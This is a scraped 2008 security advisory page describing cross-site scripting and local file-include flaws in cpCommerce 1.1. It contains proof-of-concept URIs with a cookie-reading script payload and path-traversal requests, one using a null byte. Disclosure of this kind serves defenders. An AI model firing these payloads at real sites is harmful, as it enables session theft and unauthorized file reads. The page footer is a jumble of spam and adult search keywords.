about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , cpCommerce Multiple Input Validation Vulnerabilities


Title cpCommerce Multiple Input Validation Vulnerabilities
Published 2008-04-13-12:00AM
Updated 2008-04-13-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  BugReport.IR
Vulnerable  cpCommerce cpCommerce 1.1
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available:For the cross-site scripting issue:
http://www.example.com/cpcommerce/calendar.php?obj=view.year&month=2&date=21&year=2008<script>alert(document.cookie)</script>For the local file-include issues:
http://www.example.com/cpcommerce/?action=language&language=../To%20DO%20LIST.txt
http://www.example.com/cpcommerce/category.php?action=../To%20DO%20LIST.txt%00
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 05:54:18 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c Shakela oo sexysexyse 09/10/07 200 /compo PHP+Advanc senao Wap+4+sex+ maxcpm.inf hkblt.com 8800 Femilysex www.765ses 200 /compo www.51-sf. trisha mas Shakela oo Waptrick+c www.christ mambo Remo SEEXS www.huaxim Apache htt Nike chicas des news for c sxs woman Shoutbox sexitv 1 news for c www.vidio 16777208 pics maxcpm.inf WWW.SEXPHO mambo Remo www.taojok Nate nude karee vBulletin& older printer File Zila horny virg php-nuke+2 Dilip maxcpm.inf phpBB++por avi3.2e0.0 www.drunke